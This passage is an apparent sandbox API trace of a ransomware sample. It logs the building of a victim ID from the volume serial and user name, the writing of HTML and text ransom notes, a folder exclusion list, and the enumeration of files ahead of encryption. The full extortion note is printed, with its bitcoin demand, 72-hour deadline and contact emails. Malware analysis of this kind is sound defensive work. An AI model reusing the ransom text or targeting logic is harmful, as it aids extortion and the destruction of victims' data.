enc2@dr.com\r\n\r\n") returned 1571
	[0171.165] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.192] CloseHandle (hObject=0x388) returned 1
	[0171.193] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.193] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0171.194] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.194] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.195] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.195] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.195] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0171.195] CloseHandle (hObject=0x388) returned 1
	[0171.196] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.196] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.196] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.196] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\HELP_DECRYPT_YOUR_FILES.HTML") returned 76
	[0171.196] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.202] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.202] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0171.205] CloseHandle (hObject=0x388) returned 1
	[0171.207] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.208] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.208] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0171.209] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.209] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.210] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.210] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.210] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0171.210] CloseHandle (hObject=0x388) returned 1
	[0171.211] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7f93651c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.211] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned 51
	[0171.211] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.211] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\network\\downloader\\*.*") returned 0x33
	[0171.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.212] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="windows") returned 0x0
	[0171.212] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.212] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="boot") returned 0x0
	[0171.212] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.214] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="system volume information") returned 0x0
	[0171.214] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.214] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.214] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.214] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="temp") returned 0x0
	[0171.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.215] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="program files") returned 0x0
	[0171.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.215] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.215] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="appdata") returned 0x0
	[0171.215] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.216] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="application data") returned 0x0
	[0171.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.216] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="winnt") returned 0x0
	[0171.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.216] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="tmp") returned 0x0
	[0171.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.216] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="cache") returned 0x0
	[0171.216] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="webcache") returned 0x0
	[0171.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="inetcache") returned 0x0
	[0171.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.217] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="nvidia") returned 0x0
	[0171.217] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.218] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="packages") returned 0x0
	[0171.218] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.218] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="cookies") returned 0x0
	[0171.218] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.218] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\network\\downloader\\*.*", lpSrch="programdata") returned 0x0
	[0171.218] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.218] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.219] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x7f93651c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.219] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.219] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f93651c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f93651c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f93651c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.219] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f8c3bce, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f8c3bce, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f910132, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.219] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6a32e5dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1
	[0171.219] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6b1c0120, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1
	[0171.219] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6b1c0120, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0
	[0171.219] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.220] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.220] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f531ae2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f531ae2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f531ae2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.220] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f50a262, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f50a262, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f50a262, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.220] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f50a262, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f50a262, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f50a262, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0171.220] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0171.221] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0171.221] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xc92ad7bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xc92ad7bc, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1
	[0171.221] lstrcmpW (lpString1="Office", lpString2="..") returned 1
	[0171.221] lstrcmpW (lpString1="Office", lpString2=".") returned 1
	[0171.221] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0171.221] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0171.221] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Office" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office") returned="C:\\Users\\All Users\\Microsoft\\Office"
	[0171.222] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Office" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office") returned="C:\\Users\\All Users\\Microsoft\\Office"
	[0171.222] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.222] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.222] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Office\\*.*"
	[0171.222] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\*.*" (normalized: "c:\\users\\all users\\microsoft\\office\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xc92ad7bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xc92ad7bc, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.243] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\*.*") returned 39
	[0171.243] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.243] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\*.*", cchLength=0x27 | out: lpsz="c:\\users\\all users\\microsoft\\office\\*.*") returned 0x27
	[0171.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="windows") returned 0x0
	[0171.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="boot") returned 0x0
	[0171.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="system volume information") returned 0x0
	[0171.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="temp") returned 0x0
	[0171.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="program files") returned 0x0
	[0171.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="appdata") returned 0x0
	[0171.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="application data") returned 0x0
	[0171.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="winnt") returned 0x0
	[0171.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="tmp") returned 0x0
	[0171.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="cache") returned 0x0
	[0171.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="webcache") returned 0x0
	[0171.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="inetcache") returned 0x0
	[0171.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="nvidia") returned 0x0
	[0171.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="packages") returned 0x0
	[0171.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="cookies") returned 0x0
	[0171.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\*.*", lpSrch="programdata") returned 0x0
	[0171.248] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xc92ad7bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xc92ad7bc, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.249] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xbf2c43a8, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1
	[0171.249] lstrcmpW (lpString1="AssetLibrary.ico", lpString2="..") returned 1
	[0171.249] lstrcmpW (lpString1="AssetLibrary.ico", lpString2=".") returned 1
	[0171.249] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.249] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="AssetLibrary.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\AssetLibrary.ico") returned="C:\\Users\\All Users\\Microsoft\\Office\\AssetLibrary.ico"
	[0171.249] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\AssetLibrary.ico") returned 52
	[0171.249] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.249] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\AssetLibrary.ico", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\office\\assetlibrary.ico") returned 0x34
	[0171.249] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.250] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\assetlibrary.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.250] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\office\\assetlibrary.ico" | out: lpString1="c:\\users\\all users\\microsoft\\office\\assetlibrary.ico") returned="c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"
	[0171.250] lstrlenW (lpString="c:\\users\\all users\\microsoft\\office\\assetlibrary.ico") returned 52
	[0171.250] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.250] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.251] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
